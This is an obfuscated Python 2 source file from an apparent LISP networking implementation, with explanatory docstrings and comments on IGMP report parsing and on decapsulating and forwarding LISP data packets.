if 18 - 18: ooOO00oOo . II111iiii % oOo0O0Ooo % o0000oOoOoO0o
if 87 - 87: iIii1I11I1II1 . OoooooooOO * oOo0O0Ooo
if 100 - 100: ooOO00oOo / i1IIi - oo % o0000oOoOoO0o - iIii1I11I1II1
if 17 - 17: OoOO0ooOOoo0O / Ooo00oOo00o % OoO0O00
if 71 - 71: oooO0oo0oOOOO . o0oo0o . ooOO00oOo
if 68 - 68: i11iIiiIii % iiiiIi11i * ooOO00oOo * oooO0oo0oOOOO * II111iiii + O0
if 66 - 66: OoOO0ooOOoo0O % oOoO0oo0OOOo % OoooooooOO
if 34 - 34: Ooo00oOo00o / i1I1ii1II1iII % O0 . ooOO00oOo . i1IIi
if 29 - 29: O0 . o0oo0o
if 66 - 66: iiiiIi11i * iIii1I11I1II1 % iIii1I11I1II1 * oooO0oo0oOOOO - Oo - oooO0oo0oOOOO
if 70 - 70: o0oo0o + iiiiIi11i
if 93 - 93: o0oo0o + o0000oOoOoO0o
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * ooOO00oOo
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % o0oo0o - iIii1I11I1II1 % O0
def o0oO0Oo ( packet ) :
    """Process a received IGMP packet.

    packet -- raw IPv4 packet (Python 2 byte-string) starting at the IP
    header; the IGMP message follows the variable-length header.

    Handles IGMPv1/v2 membership reports (types 0x12/0x16), IGMPv2
    leave (0x17) and IGMPv3 membership reports (0x22).  Each report is
    translated into [source-or-None, group-address-string, join-flag]
    entries which are handed to iIIIiIii() together with the global
    Oo0o0000o0o0 socket set.  Returns None on every path; effects are
    logging plus those calls.
    """
    global Oo0o0000o0o0
    if 71 - 71: Ooo00oOo00o - oOo0O0Ooo * i1I1ii1II1iII + o0000oOoOoO0o % i11iIiiIii - Oo
    oOO0o0 = lisp . bold ( "Receive" , False )
    lisp . lprint ( "{} {}-byte IGMP packet: {}" . format ( oOO0o0 , len ( packet ) ,
        lisp . lisp_format_packet ( packet ) ) )
    if 82 - 82: o0oo0o - II11iiII + ooOO00oOo
    if 64 - 64: Ooo00oOo00o . O0 * o0000oOoOoO0o + OoooooooOO - OoO0O00 . OoooooooOO
    if 70 - 70: OoO0O00 - iiiiIi11i . iIii1I11I1II1 % OoOO0ooOOoo0O / oOo0O0Ooo - O0
    if 55 - 55: i1I1ii1II1iII - ooOO00oOo
    # IP header length: the low nibble of the first byte is the IHL in
    # 32-bit words; multiply by 4 for a byte count (Python 2: packet[0]
    # is a one-character string, hence the struct.unpack("B", ...)).
    o0i1I11iI1iiI = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
    if 48 - 48: OoOO0ooOOoo0O . OoooooooOO . oo . oOo0O0Ooo % oOoO0oo0OOOo / i1I1ii1II1iII
    if 11 - 11: i1IIi % ooOO00oOo % i1I1ii1II1iII
    if 99 - 99: Oo / iIii1I11I1II1 - o0000oOoOoO0o * oOoO0oo0OOOo % oo
    if 13 - 13: ooOO00oOo
    # Skip the IP header; the first byte of the IGMP message is its type.
    O0oo0O0 = packet [ o0i1I11iI1iiI : : ]
    iiII111iIII1Ii = struct . unpack ( "B" , O0oo0O0 [ 0 ] ) [ 0 ]
    i1111IIiii1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
    if 19 - 19: iiiiIi11i * oo % i11iIiiIii
    # Only v1/v2 reports (0x12/0x16), v2 leave (0x17) and the v3 report
    # (0x22) are processed.
    iiI1Ii1I = ( iiII111iIII1Ii in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
    if ( iiI1Ii1I == False ) :
        # IiII1IiiIiI1 (defined elsewhere in this file) maps known IGMP
        # type values to printable names for the log message.
        i11Ii1iIiII = "{} ({})" . format ( iiII111iIII1Ii , IiII1IiiIiI1 [ iiII111iIII1Ii ] ) if IiII1IiiIiI1 . has_key ( iiII111iIII1Ii ) else iiII111iIII1Ii
        if 81 - 81: OoOO0ooOOoo0O . OoooooooOO * oOo0O0Ooo % oooO0oo0oOOOO . OoOO0ooOOoo0O
        lisp . lprint ( "IGMP type {} not supported" . format ( i11Ii1iIiII ) )
        return
    if 60 - 60: II11iiII / oo
    if 78 - 78: OoOO0ooOOoo0O . oooO0oo0oOOOO
    # Need at least the 4-byte fixed header plus the 32-bit group field.
    if ( len ( O0oo0O0 ) < 8 ) :
        lisp . lprint ( "IGMP message too small" )
        return
    if 38 - 38: oOo0O0Ooo + oooO0oo0oOOOO
    if 15 - 15: OoO0O00 + OoOO0ooOOoo0O . Oo - iIii1I11I1II1 / O0 % iIii1I11I1II1
    if 86 - 86: oo / iiiiIi11i * o0000oOoOoO0o
    if 64 - 64: Oo / O0 * oOo0O0Ooo * Oo
    if 60 - 60: OoOO0ooOOoo0O / i1IIi % oOoO0oo0OOOo / oOoO0oo0OOOo * oOoO0oo0OOOo . i11iIiiIii
    if 99 - 99: oOo0O0Ooo
    # Second 32-bit word: the group address for v1/v2 messages.  (For a
    # v3 report this same field is reused below as the record count.)
    i1111IIiii1 . address = socket . ntohl ( struct . unpack ( "II" , O0oo0O0 [ : 8 ] ) [ 1 ] )
    oO00OoOo = i1111IIiii1 . print_address_no_iid ( )
    if 74 - 74: II111iiii . O0 - oo + oooO0oo0oOOOO % i11iIiiIii % oOo0O0Ooo
    if 78 - 78: o0000oOoOoO0o + oOo0O0Ooo + oooO0oo0oOOOO - oooO0oo0oOOOO . i11iIiiIii / ooOO00oOo
    if 27 - 27: o0000oOoOoO0o - O0 % OoOO0ooOOoo0O * o0oo0o . oooO0oo0oOOOO % iIii1I11I1II1
    if 37 - 37: OoooooooOO + O0 - i1IIi % Oo
    # IGMPv2 leave -> deregister (*, G).
    if ( iiII111iIII1Ii == 0x17 ) :
        lisp . lprint ( "IGMPv2 leave (*, {})" . format ( lisp . bold ( oO00OoOo , False ) ) )
        iIIIiIii ( Oo0o0000o0o0 ,
            [ [ None , oO00OoOo , False ] ] )
        return
    if 24 - 24: oOo0O0Ooo
    # IGMPv1/v2 join -> register (*, G), unless the group is link-local.
    if ( iiII111iIII1Ii in ( 0x12 , 0x16 ) ) :
        lisp . lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( iiII111iIII1Ii == 0x12 ) else 2 , lisp . bold ( oO00OoOo , False ) ) )
        if 94 - 94: i1IIi * i1IIi % II111iiii + II11iiII
        if 28 - 28: oo
        if 49 - 49: OoOO0ooOOoo0O . Ooo00oOo00o % iiiiIi11i / o0000oOoOoO0o
        if 95 - 95: O0 * oOo0O0Ooo * oooO0oo0oOOOO . Oo / iIii1I11I1II1
        if 28 - 28: oooO0oo0oOOOO + iiiiIi11i - Oo / iIii1I11I1II1 - oo
        if ( oO00OoOo . find ( "224.0.0." ) != - 1 ) :
            lisp . lprint ( "Suppress registration for link-local groups" )
        else :
            iIIIiIii ( Oo0o0000o0o0 ,
                [ [ None , oO00OoOo , True ] ] )
        if 45 - 45: O0 / i1IIi * iiiiIi11i * ooOO00oOo
        if 35 - 35: oOoO0oo0OOOo / i1I1ii1II1iII % oo + iIii1I11I1II1
        if 79 - 79: oOo0O0Ooo / Oo
        if 77 - 77: OoO0O00
        if 46 - 46: o0oo0o
        return
    if 72 - 72: i1I1ii1II1iII * II11iiII
    if 67 - 67: i1IIi
    if 5 - 5: II111iiii . OoooooooOO
    if 57 - 57: oo
    if 35 - 35: OoooooooOO - o0oo0o / ooOO00oOo
    # From here on: IGMPv3 membership report (0x22).  The word parsed as
    # the "group" above is actually the number of group records.
    iii11i1 = i1111IIiii1 . address
    O0oo0O0 = O0oo0O0 [ 8 : : ]
    if 48 - 48: Oo * oOoO0oo0OOOo
    # Per-record fixed header: record-type, aux-data-len, source-count,
    # group address; each listed source is an additional 32-bit word.
    II111iIiI1Ii = "BBHI"
    Ii1iiII1i = struct . calcsize ( II111iIiI1Ii )
    oO00O = "I"
    IIiI11 = struct . calcsize ( oO00O )
    II1iIi11 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
    if 9 - 9: Oo + II111iiii % Oo % oooO0oo0oOOOO + iIii1I11I1II1
    if 59 - 59: i1IIi
    if 48 - 48: O0 * o0000oOoOoO0o * ooOO00oOo . ooOO00oOo * OoOO0ooOOoo0O - o0000oOoOoO0o
    if 14 - 14: oOoO0oo0OOOo + i11iIiiIii
    # Accumulate [source, group, join?] entries across all records.
    OOOoo = [ ]
    for OO in range ( iii11i1 ) :
        # Truncated packet: stop processing entirely.
        if ( len ( O0oo0O0 ) < Ii1iiII1i ) : return
        III1II1iii1i , O0OO0oOO , ooooO , oO0O0 = struct . unpack ( II111iIiI1Ii ,
            O0oo0O0 [ : Ii1iiII1i ] )
        if 19 - 19: o0000oOoOoO0o
        O0oo0O0 = O0oo0O0 [ Ii1iiII1i : : ]
        if 55 - 55: II11iiII % II11iiII / O0 % i1I1ii1II1iII - Ooo00oOo00o . OoO0O00
        # oo0O0o00 maps valid IGMPv3 record types 1-6 to names.
        if ( oo0O0o00 . has_key ( III1II1iii1i ) == False ) :
            lisp . lprint ( "Invalid record type {}" . format ( III1II1iii1i ) )
            continue
        if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
        if 90 - 90: Ooo00oOo00o % oOoO0oo0OOOo - iIii1I11I1II1 % oOo0O0Ooo
        IIiI11I1I1i1i = oo0O0o00 [ III1II1iii1i ]
        ooooO = socket . ntohs ( ooooO )
        i1111IIiii1 . address = socket . ntohl ( oO0O0 )
        oO00OoOo = i1111IIiii1 . print_address_no_iid ( )
        if 86 - 86: i1IIi
        lisp . lprint ( "Record type: {}, group: {}, source-count: {}" . format ( IIiI11I1I1i1i , oO00OoOo , ooooO ) )
        if 13 - 13: O0
        if 70 - 70: o0000oOoOoO0o . i11iIiiIii % o0000oOoOoO0o . O0 - iIii1I11I1II1
        if 26 - 26: II11iiII
        if 76 - 76: i1IIi * OoooooooOO * O0 + o0oo0o * o0oo0o
        if 35 - 35: Ooo00oOo00o
        if 73 - 73: O0 - oOoO0oo0OOOo
        if 2 - 2: II111iiii / o0oo0o
        # Types 1 (include-mode) and 5 (allow-new-source) are joins; a
        # type 4 (change-to-exclude) with no sources is a (*, G) join.
        # Everything else is treated as a leave.
        ii1 = False
        if ( III1II1iii1i in ( 1 , 5 ) ) : ii1 = True
        if ( III1II1iii1i == 4 and ooooO == 0 ) : ii1 = True
        OoOoO0oOOooo = "join" if ( ii1 ) else "leave"
        if 99 - 99: iIii1I11I1II1
        if 14 - 14: oOoO0oo0OOOo % oo . II111iiii . oo - Oo
        if 45 - 45: oooO0oo0oOOOO / O0 / oOo0O0Ooo * II11iiII
        if 18 - 18: iIii1I11I1II1 + II11iiII + iIii1I11I1II1 . oOoO0oo0OOOo + o0oo0o . Oo
        if ( oO00OoOo . find ( "224.0.0." ) != - 1 ) :
            lisp . lprint ( "Suppress registration for link-local groups" )
            continue
        if 7 - 7: oOoO0oo0OOOo + iIii1I11I1II1 * OoOO0ooOOoo0O * OoOO0ooOOoo0O / II111iiii - o0000oOoOoO0o
        if 65 - 65: iiiiIi11i + oOo0O0Ooo + II111iiii
        if 77 - 77: II111iiii
        if 50 - 50: O0 . O0 . Oo % OoO0O00
        if 68 - 68: iiiiIi11i
        if 10 - 10: o0000oOoOoO0o
        if 77 - 77: II11iiII / II111iiii + oooO0oo0oOOOO + Oo - i11iIiiIii
        if 44 - 44: oo + oOo0O0Ooo + oOoO0oo0OOOo . oo * oOo0O0Ooo % iIii1I11I1II1
        # No sources listed: a single (*, G) entry.
        if ( ooooO == 0 ) :
            OOOoo . append ( [ None , oO00OoOo , ii1 ] )
            lisp . lprint ( "IGMPv3 {} (*, {})" . format ( lisp . bold ( OoOoO0oOOooo , False ) ,
                lisp . bold ( oO00OoOo , False ) ) )
        if 72 - 72: II11iiII . II11iiII - oOoO0oo0OOOo
        if 48 - 48: OoO0O00 - Oo + OoO0O00 - oo * i11iIiiIii . i1I1ii1II1iII
        if 35 - 35: oooO0oo0oOOOO . O0 + OoO0O00 + II11iiII + i1IIi
        if 65 - 65: O0 * oo / oo . oOo0O0Ooo
        if 87 - 87: II111iiii * oOoO0oo0OOOo % OoO0O00 * OoO0O00
        # One (S, G) entry per listed source address.
        for O0O in range ( ooooO ) :
            if ( len ( O0oo0O0 ) < IIiI11 ) : return
            oO0O0 = struct . unpack ( oO00O , O0oo0O0 [ : IIiI11 ] ) [ 0 ]
            II1iIi11 . address = socket . ntohl ( oO0O0 )
            OOOOO0 = II1iIi11 . print_address_no_iid ( )
            OOOoo . append ( [ OOOOO0 , oO00OoOo , ii1 ] )
            lisp . lprint ( "{} ({}, {})" . format ( OoOoO0oOOooo ,
                lisp . green ( OOOOO0 , False ) , lisp . bold ( oO00OoOo , False ) ) )
            O0oo0O0 = O0oo0O0 [ IIiI11 : : ]
    if 79 - 79: II111iiii - Oo . i1IIi + O0 % O0 * oo
    if 7 - 7: i1IIi + II11iiII % i1I1ii1II1iII / Ooo00oOo00o + i1IIi
    if 41 - 41: o0000oOoOoO0o + i11iIiiIii / oooO0oo0oOOOO % oOoO0oo0OOOo
    if 22 - 22: oOo0O0Ooo % Ooo00oOo00o * o0000oOoOoO0o - oOoO0oo0OOOo + Ooo00oOo00o - OoO0O00
    if 15 - 15: II11iiII
    if 31 - 31: i1I1ii1II1iII / i1IIi . ooOO00oOo
    if 83 - 83: iiiiIi11i / iIii1I11I1II1 + i1IIi / i1I1ii1II1iII
    if 47 - 47: iiiiIi11i + OoooooooOO . II111iiii . i1I1ii1II1iII
    # Register/deregister everything collected from this report.
    if ( len ( OOOoo ) != 0 ) :
        iIIIiIii ( Oo0o0000o0o0 , OOOoo )
    if 66 - 66: Oo * oOo0O0Ooo
    return
if 2 - 2: iiiiIi11i . o0oo0o * OoO0O00 + O0 - OoOO0ooOOoo0O * iIii1I11I1II1
if 12 - 12: Ooo00oOo00o * o0oo0o % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: OoO0O00 - OoOO0ooOOoo0O
if 24 - 24: OoooooooOO . ooOO00oOo * II111iiii
if 59 - 59: o0oo0o + ooOO00oOo / II11iiII
if 97 - 97: OoO0O00 * i1I1ii1II1iII % Oo . i1I1ii1II1iII - o0oo0o - II11iiII
if 79 - 79: oo - Oo
if 37 - 37: oooO0oo0oOOOO . OoO0O00 * OoO0O00 * II111iiii * O0
def o00O ( parms , not_used , packet ) :
    """Packet-capture callback for frames arriving on a LISP interface.

    parms -- [device-name, raw-socket]; not_used is ignored; packet --
    captured frame payload (Python 2 byte-string).

    Dispatches IGMP packets to o0oO0Oo(), RLOC-probes to the control
    plane via lisp.lisp_parse_packet(), and otherwise decapsulates a
    LISP data packet and forwards the inner packet (bridging MAC
    frames, or re-sending IPv4/IPv6).  Returns None in all paths.
    """
    global I11
    if 88 - 88: i11iIiiIii + i1I1ii1II1iII * oOo0O0Ooo * i1I1ii1II1iII + OoOO0ooOOoo0O
    O0OOO00OooO = parms [ 0 ]
    oOo0oooo00o = parms [ 1 ]
    if 64 - 64: ooOO00oOo . oo - OoooooooOO . Oo - i1I1ii1II1iII
    if 77 - 77: o0000oOoOoO0o % oOo0O0Ooo / II111iiii % i1I1ii1II1iII % OoooooooOO % ooOO00oOo
    if 19 - 19: oooO0oo0oOOOO * o0oo0o / iiiiIi11i * o0oo0o - OoooooooOO * OoOO0ooOOoo0O
    if 17 - 17: II111iiii + OoO0O00 . o0oo0o
    if 12 - 12: o0oo0o + II11iiII + OoOO0ooOOoo0O . oooO0oo0oOOOO / o0000oOoOoO0o
    if 29 - 29: oooO0oo0oOOOO . Oo - II111iiii
    # On non-macOS systems strip the capture-library datalink header:
    # 4 bytes for the loopback device, 16 otherwise.
    if ( lisp . lisp_is_macos ( ) == False ) :
        ooooO0 = 4 if O0OOO00OooO == "lo0" else 16
        packet = packet [ ooooO0 : : ]
    if 37 - 37: i11iIiiIii + oo . II11iiII % OoOO0ooOOoo0O % OoOO0ooOOoo0O
    if 26 - 26: O0
    if 34 - 34: Oo * o0oo0o
    if 97 - 97: i11iIiiIii % iiiiIi11i / OoO0O00 / OoO0O00
    if 97 - 97: II111iiii - o0oo0o - iIii1I11I1II1 * oo
    # IP protocol field (byte 9 of the IP header); 2 is IGMP.
    ooo = struct . unpack ( "B" , packet [ 9 ] ) [ 0 ]
    if ( ooo == 2 ) :
        o0oO0Oo ( packet )
        return
    if 88 - 88: o0oo0o % oooO0oo0oOOOO / o0000oOoOoO0o - oo / oo * Oo
    if 77 - 77: oooO0oo0oOOOO
    if 66 - 66: iIii1I11I1II1 . i11iIiiIii / OoOO0ooOOoo0O / Oo + o0oo0o
    if 5 - 5: oOo0O0Ooo % i1I1ii1II1iII + oooO0oo0oOOOO
    if 13 - 13: oooO0oo0oOOOO
    # lisp_is_rloc_probe() returns a modified buffer when the packet is
    # an RLOC-probe; when that happens, feed it to the control plane.
    ii1II1II = packet
    packet , II1iIi11 , i11i11II11i , II1Ii1I1i = lisp . lisp_is_rloc_probe ( packet , 0 )
    if ( ii1II1II != packet ) :
        if ( II1iIi11 == None ) : return
        lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , II1iIi11 , i11i11II11i , II1Ii1I1i )
        return
    if 74 - 74: oOoO0oo0OOOo * i11iIiiIii / oo - O0 . Oo
    if 39 - 39: Oo / O0 * oooO0oo0oOOOO
    if 17 - 17: o0000oOoOoO0o / iIii1I11I1II1 - ooOO00oOo + oo % II11iiII
    if 14 - 14: Ooo00oOo00o % oooO0oo0oOOOO + oOoO0oo0OOOo + ooOO00oOo
    if 76 - 76: ooOO00oOo - i11iIiiIii + oOo0O0Ooo + II11iiII / OoooooooOO
    if 50 - 50: II111iiii - o0oo0o + iIii1I11I1II1 + iIii1I11I1II1
    if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + oOoO0oo0OOOo - II111iiii
    # 16-bit field at offset 20 (start of the UDP header after a 20-byte
    # IP header); ignore packets sourced from the LISP data port.
    iiIiiIi1 = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
    if ( iiIiiIi1 == lisp . LISP_DATA_PORT ) : return
    packet = lisp . lisp_reassemble ( packet )
    if ( packet == None ) : return
    if 30 - 30: II11iiII + II111iiii - oooO0oo0oOOOO * OoooooooOO
    # Decapsulate: parse outer headers and the LISP header, updating
    # decap statistics; decode() returns None on a malformed packet.
    packet = lisp . lisp_packet ( packet )
    I1iIiiiI1 = packet . decode ( True , I11 , lisp . lisp_decap_stats )
    if ( I1iIiiiI1 == None ) : return
    if 87 - 87: oOo0O0Ooo - Oo - II11iiII + OoO0O00 % iIii1I11I1II1 / i11iIiiIii
    if 12 - 12: Oo
    if 86 - 86: iiiiIi11i - ooOO00oOo
    if 63 - 63: oo / oOo0O0Ooo + OoooooooOO . OoOO0ooOOoo0O . Oo
    packet . print_packet ( "Receive" , True )
    if 48 - 48: i1IIi - i1I1ii1II1iII - i11iIiiIii . OoOO0ooOOoo0O - i1I1ii1II1iII * OoOO0ooOOoo0O
    if 60 - 60: oOo0O0Ooo / oOoO0oo0OOOo + II11iiII - i1I1ii1II1iII
    if 49 - 49: ooOO00oOo - O0 / ooOO00oOo * oOo0O0Ooo + o0oo0o
    if 35 - 35: II111iiii . oo / i1IIi / oo * iiiiIi11i
    if 85 - 85: II111iiii . Oo % II11iiII % OoOO0ooOOoo0O
    if 80 - 80: iiiiIi11i * OoOO0ooOOoo0O / iIii1I11I1II1 % iiiiIi11i / iIii1I11I1II1
    if 42 - 42: i1IIi / i11iIiiIii . OoO0O00 * i1I1ii1II1iII . i11iIiiIii * O0
    if 44 - 44: i1IIi . oo / i11iIiiIii + oooO0oo0oOOOO
    # LISP-Decent: multicast control traffic in instance-id 0xffffff is
    # relayed to the "lisp-ms" process over IPC instead of forwarded.
    if ( lisp . lisp_decent_configured and
        packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
        if 27 - 27: II11iiII
        II1iIi11 = packet . inner_source . print_address_no_iid ( )
        packet . strip_outer_headers ( )
        # Drop the inner IP/UDP headers (28 bytes) before the IPC send.
        packet = packet . packet [ 28 : : ]
        packet = lisp . lisp_packet_ipc ( packet , II1iIi11 , iiIiiIi1 )
        lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
        return
    if 52 - 52: o0oo0o % oOo0O0Ooo + iIii1I11I1II1 * iiiiIi11i . o0000oOoOoO0o
    if 95 - 95: iIii1I11I1II1 . oooO0oo0oOOOO - OoooooooOO * ooOO00oOo / Ooo00oOo00o
    if 74 - 74: iiiiIi11i
    if 34 - 34: i1I1ii1II1iII
    if 44 - 44: i1IIi % oo % Ooo00oOo00o
    if 9 - 9: OoO0O00 % OoooooooOO - o0000oOoOoO0o
    # An external data-plane owns forwarding; drop here.
    if ( lisp . lisp_ipc_data_plane ) :
        lisp . dprint ( "Drop packet, external data-plane active" )
        return
    if 43 - 43: ooOO00oOo % ooOO00oOo
    if 46 - 46: OoO0O00 % iIii1I11I1II1 . i1I1ii1II1iII . O0 * Oo / OoooooooOO
    if 7 - 7: iiiiIi11i - O0 * OoOO0ooOOoo0O - Ooo00oOo00o - II111iiii
    if 41 - 41: oo - o0oo0o % II111iiii . o0oo0o - OoOO0ooOOoo0O
    if 45 - 45: o0000oOoOoO0o - II11iiII
    lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
    if 70 - 70: ooOO00oOo % oo / oo . OoOO0ooOOoo0O % Oo . II111iiii
    if 10 - 10: o0000oOoOoO0o - i11iIiiIii . oOoO0oo0OOOo % i1IIi
    if 78 - 78: iIii1I11I1II1 * OoO0O00 . OoO0O00 - II11iiII . iIii1I11I1II1
    if 30 - 30: Oo + Oo % oooO0oo0oOOOO - Ooo00oOo00o - oOoO0oo0OOOo
    # Remove outer IP/UDP/LISP headers, then sanitize the inner header
    # per its type before forwarding.
    packet . strip_outer_headers ( )
    i111IiiI1Ii = lisp . bold ( "Forward" , False )
    if 72 - 72: O0 . oOo0O0Ooo * OoO0O00 + oOoO0oo0OOOo - Ooo00oOo00o
    if 40 - 40: ooOO00oOo + ooOO00oOo
    if 94 - 94: i1I1ii1II1iII * iIii1I11I1II1 . OoOO0ooOOoo0O
    if 13 - 13: iIii1I11I1II1 * oOo0O0Ooo / o0oo0o % Oo + iiiiIi11i
    iiiI1iI1 = packet . inner_dest . is_mac ( )
    if ( iiiI1iI1 ) :
        packet . packet = lisp . lisp_mac_input ( packet . packet )
        if ( packet . packet == None ) : return
        i111IiiI1Ii = lisp . bold ( "Bridge" , False )
    elif ( packet . inner_version == 4 ) :
        packet . packet = lisp . lisp_ipv4_input ( packet . packet )
        if ( packet . packet == None ) : return
        packet . inner_ttl = packet . outer_ttl
    elif ( packet . inner_version == 6 ) :
        # NOTE(review): lisp_ipv6_input() is passed the packet object,
        # not packet.packet like the IPv4 case -- confirm intended.
        packet . packet = lisp . lisp_ipv6_input ( packet )
        if ( packet . packet == None ) : return
        packet . inner_ttl = packet . outer_ttl
    else :
        lisp . dprint ( "Cannot parse inner packet header" )
        return
    if 15 - 15: oooO0oo0oOOOO . i1IIi * oOo0O0Ooo % iIii1I11I1II1
    if 35 - 35: oOoO0oo0OOOo + o0oo0o - oOo0O0Ooo % iiiiIi11i % Ooo00oOo00o % oOo0O0Ooo
    if 45 - 45: oo * II11iiII % ooOO00oOo
    if 24 - 24: Oo - OoOO0ooOOoo0O * iiiiIi11i
    if 87 - 87: o0000oOoOoO0o - oOoO0oo0OOOo % oOoO0oo0OOOo . iiiiIi11i / oOoO0oo0OOOo
    # Count the decap against the matching database-mapping; a unicast
    # inner destination with no mapping is dropped.
    if ( packet . inner_dest . is_multicast_address ( ) == False ) :
        oo000 = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
        if ( oo000 ) :
            oo000 . increment_decap_stats ( packet )
        else :
            lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
            if 6 - 6: oOo0O0Ooo / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
            return
    if 79 - 79: oooO0oo0oOOOO % ooOO00oOo
    if 81 - 81: i11iIiiIii + i11iIiiIii * ooOO00oOo + oooO0oo0oOOOO
    if 32 - 32: O0 . OoooooooOO
    if 15 - 15: oo . ooOO00oOo
    if 17 - 17: i11iIiiIii / OoO0O00 . ooOO00oOo / oo
    if 38 - 38: i1IIi . oOoO0oo0OOOo % o0000oOoOoO0o + iIii1I11I1II1 + O0
    oOOoo0Oo = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
        packet . inner_dest . print_address ( ) )
    if 47 - 47: ooOO00oOo + oooO0oo0oOOOO / II111iiii
    lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( i111IiiI1Ii , lisp . green ( oOOoo0Oo , False ) ,
        # i1IIi % o0000oOoOoO0o - ooOO00oOo / iiiiIi11i . Oo / OoO0O00
        lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
    if 99 - 99: ooOO00oOo - oOo0O0Ooo * oOo0O0Ooo . II111iiii % Oo
    if 1 - 1: oOoO0oo0OOOo + OoO0O00 * iiiiIi11i + Ooo00oOo00o - OoOO0ooOOoo0O . oOoO0oo0OOOo
    if 31 - 31: iIii1I11I1II1 . II111iiii - ooOO00oOo
    if 62 - 62: II11iiII / II111iiii + oOo0O0Ooo % Oo / oOo0O0Ooo + oOoO0oo0OOOo
    if 2 - 2: i11iIiiIii - o0oo0o + ooOO00oOo % OoOO0ooOOoo0O * o0000oOoOoO0o
    # L2 frames are bridged rather than routed.
    # NOTE(review): oo000 is only bound on the non-multicast path above;
    # a bridged multicast frame would raise NameError here -- confirm.
    if ( iiiI1iI1 ) :
        packet . bridge_l2_packet ( packet . inner_dest , oo000 )
        return
    if 54 - 54: O0 - i1I1ii1II1iII . II11iiII % i1I1ii1II1iII + i1I1ii1II1iII
    if 36 - 36: II11iiII % i11iIiiIii
    if 47 - 47: i1IIi + II111iiii . OoO0O00 * iiiiIi11i . OoOO0ooOOoo0O / i1IIi
    if 50 - 50: o0oo0o / i1IIi % OoooooooOO
    if 83 - 83: oOoO0oo0OOOo * oOoO0oo0OOOo + II11iiII
    if 57 - 57: O0 - O0 . oOoO0oo0OOOo / Ooo00oOo00o / o0000oOoOoO0o
    # IPv6 inner packets are sent via an L2 socket (oO0o0o0ooO0oO /
    # oo0o0O00 are module-level names defined elsewhere in this file).
    if ( packet . inner_version == 6 ) :
        packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
        return
    if 20 - 20: II11iiII * II111iiii - oOo0O0Ooo - iiiiIi11i * o0oo0o
    if 6 - 6: Oo + II11iiII / OoO0O00 + oooO0oo0oOOOO % II111iiii / ooOO00oOo
    if 45 - 45: OoooooooOO
    if 9 - 9: OoOO0ooOOoo0O . ooOO00oOo * i1IIi . OoooooooOO
    if 32 - 32: oOo0O0Ooo . oOoO0oo0OOOo % oo - II111iiii
    # IPv4: prefer a packet-specific raw socket, falling back to the
    # raw socket supplied in parms.
    iiI111 = packet . get_raw_socket ( )
    if ( iiI111 == None ) : iiI111 = oOo0oooo00o
    if 62 - 62: oOoO0oo0OOOo - O0 . oo . O0 * iIii1I11I1II1
    if 92 - 92: iiiiIi11i / II11iiII . oOoO0oo0OOOo
    if 30 - 30: o0000oOoOoO0o . oOoO0oo0OOOo / II11iiII
    if 2 - 2: oooO0oo0oOOOO % oo - o0oo0o
    packet . send_packet ( iiI111 , packet . inner_dest )
    return
if 79 - 79: OoooooooOO / oOoO0oo0OOOo . O0
if 79 - 79: iiiiIi11i - II111iiii
if 43 - 43: i1IIi + O0 % ooOO00oOo / o0000oOoOoO0o * oo
if 89 - 89: oo . OoO0O00 + oOoO0oo0OOOo . O0 % Ooo00oOo00o
if 84 - 84: OoooooooOO + o0oo0o / oo % II11iiII % oOoO0oo0OOOo * oo
if 58 - 58: ooOO00oOo - oOo0O0Ooo . i11iIiiIii % i11iIiiIii / i1IIi / iiiiIi11i
if 24 - 24: oo * i1IIi % Oo / O0 + i11iIiiIii
if 12 - 12: oOoO0oo0OOOo / o0000oOoOoO0o
if 5 - 5: OoooooooOO
if 18 - 18: oo % OoooooooOO - i1I1ii1II1iII . i11iIiiIii * OoO0O00 % o0000oOoOoO0o
if 12 - 12: i1IIi / II11iiII % Oo * oooO0oo0oOOOO * O0 * iIii1I11I1II1
def OOOO ( lisp_raw_socket , packet , source ) :
    """Decapsulate a LISP data packet delivered via a kernel UDP socket
    (the NAT-traversal receive path).

    lisp_raw_socket -- fallback raw socket for forwarding the inner
    packet; packet -- UDP payload beginning with the 8-byte LISP data
    header; source -- source RLOC address string of the outer packet.

    Instance-id 0xffffff traffic is control traffic: multicast goes to
    the "lisp-ms" process over IPC, unicast is fed to
    lisp.lisp_parse_packet().  Everything else is decapsulated and the
    inner packet re-sent.  Returns None in all paths.
    """
    global I11 , Oo0o0000o0o0
    if 98 - 98: iiiiIi11i . OoooooooOO
    if 54 - 54: O0 / oooO0oo0oOOOO % Oo * i1IIi * O0
    if 48 - 48: Ooo00oOo00o . iiiiIi11i % oOo0O0Ooo - oOo0O0Ooo
    if 33 - 33: OoOO0ooOOoo0O % II111iiii + ooOO00oOo
    # Keep the original buffer for decoding the LISP header; the
    # lisp_packet itself is built from the inner packet past those
    # first 8 bytes.
    OoIi1I1I = packet
    packet = lisp . lisp_packet ( packet [ 8 : : ] )
    if ( packet . lisp_header . decode ( OoIi1I1I ) == False ) : return
    if 56 - 56: O0
    if 45 - 45: oOo0O0Ooo - ooOO00oOo - oOo0O0Ooo
    if 41 - 41: OoO0O00 / i1IIi / OoO0O00 - i1I1ii1II1iII . Ooo00oOo00o
